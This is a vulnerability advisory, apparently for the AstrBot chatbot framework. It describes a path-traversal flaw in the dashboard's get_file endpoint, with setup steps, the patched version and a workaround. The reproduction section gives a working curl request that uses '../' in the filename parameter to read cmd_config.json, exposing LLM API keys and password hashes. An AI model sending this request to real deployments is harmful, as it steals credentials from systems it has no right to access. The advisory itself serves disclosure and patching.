Impact This vulnerability may lead to: Information disclosure, such as API keys for LLM providers, account passwords, and other sensitive data. Reproduce Follow these steps to set up a test environment for reproducing the vulnerability: Install dependencies and clone the repository: bash pip install uv git clone https://github.com/AstrBotDevs/AstrBot && cd AstrBot uv run main.py Alternatively, deploy the program via pip: bash mkdir astrbot && cd astrbot uvx astrbot init uvx astrbot run In another terminal, run the following command to exploit the vulnerability: bash curl -L https://0.0.0.0:6185/api/chat/get_file?filename=../../../data/cmd_config.json This request will read the cmd_config.json config file, leading to the leakage of sensitive data such as LLM API keys, usernames, and password hashes (MD5). Patches The vulnerability has been addressed in Pull Request #1676 and is included in versions >= v3.5.13. All users are strongly encouraged to upgrade to v3.5.13 or later. Workarounds Users can edit the cmd_config.json file to disable the dashboard feature as a temporary workaround. However, it is strongly recommended to upgrade to version v3.5.13 or later as soon as possible to fully resolve this issue. References Pull Request #1676 Issue…Read More